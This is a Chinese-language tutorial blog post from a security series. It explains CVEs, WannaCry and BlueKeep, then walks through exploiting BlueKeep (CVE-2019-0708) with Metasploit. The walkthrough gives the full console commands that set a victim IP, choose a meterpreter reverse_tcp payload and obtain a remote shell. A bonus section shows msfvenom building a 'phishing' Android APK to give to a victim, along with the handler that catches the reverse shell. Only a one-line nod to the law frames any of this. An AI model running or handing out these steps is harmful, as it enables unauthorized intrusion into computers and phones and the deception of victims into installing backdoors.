iT邦幫忙

第 12 屆 iThome 鐵人賽

DAY 29
0
Security

資訊安全的美味雜炊系列 第 29

[Day29] - kali 0x4 Metasploit

  • 分享至 

  • xImage
  •  

Day29 - kali 0x4 Metasploit

前言

  • 昨天提完破密工具之後,今天來講講這個exploit整合包

CVE (Common Vulnerabilities and Exposures)

  • 通用漏洞披漏 (常見弱點和漏洞)
  • 一個與資訊安全有關的資料庫,收集各種資安弱點及漏洞並給予編號以便於公眾查閱

Rule

  • CVE - YYYY - NNNN
  • CVE - (西元分) - (流水號)

Wannacry (CVE-2017-0143~0148)

  • 內容: 利用 windows 漏洞 (MS17-010) 永恆之藍
  • 影響範圍: windows 7 版本之前
  • 受感染的電腦會有大量檔案被加密,並且要求高價彼特幣贖金

BlueKeep (CVE-2019-0708)

Metasploit

  • 接著我們提提今天重頭戲Metasploit,他整合了部分CVE的exploit,讓使用者可以透過簡單的指令打出漏洞

What is Metasploit?

基本用法

  • 啟動: msfconsole
  • 查詢漏洞: search <漏洞名稱>
  • 選擇漏洞: use <漏洞檔案>

使用方式(以 CVE 2019-0708 做舉例)

匯入exploit

  • 可在exploit-db上面找exploit匯入到Metasploit中

新版的kali已經預設就有這個exploit了,不須匯入

找 exploit

  • cve_2019_0708_bluekeep_rce.rb
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //選擇exploit
show options //查看設定參數
set rhosts <target_ip> //設定被害者的ip
set GROOMSIZE 50 
set payload windows/x64/meterpreter/reverse_tcp //設定攻擊payload
set lhost <your_ip>
// windows7 SP1 VBOX
set target 2
run //攻擊腳本執行
//成功之後 shell 可進對方 cmd

Meterpreter

  • 破解成功之後的後門程式
  • 添加一個用戶,隱藏一些東西,打開shell等等
  • windows/Linux/Android...都有支援

打成功就可以拿到shell

配合meterpreter,就可以拿到shell


同場加映 - 製作釣魚 APK

  • msfvenom -p android/meterpreter/reverse_tcp
  • LHOST=<your_ip> LPORT=<port> > <file>
  • 然後就會在電腦生成apk,這時候拿給受害者裝app,就可以拿到shell了

Android Reverse shell

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <your_ip>
exploit

技術總結

  • Kali 工具多到爆,有興趣可以自行研究
  • 常常關注 CVE,Metasploit 的最新動態
  • 台灣有法律,好自為之

上一篇
[Day28] - kali 0x3 破密工具
下一篇
[Day30] - 完賽、感想、心得
系列文
資訊安全的美味雜炊30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言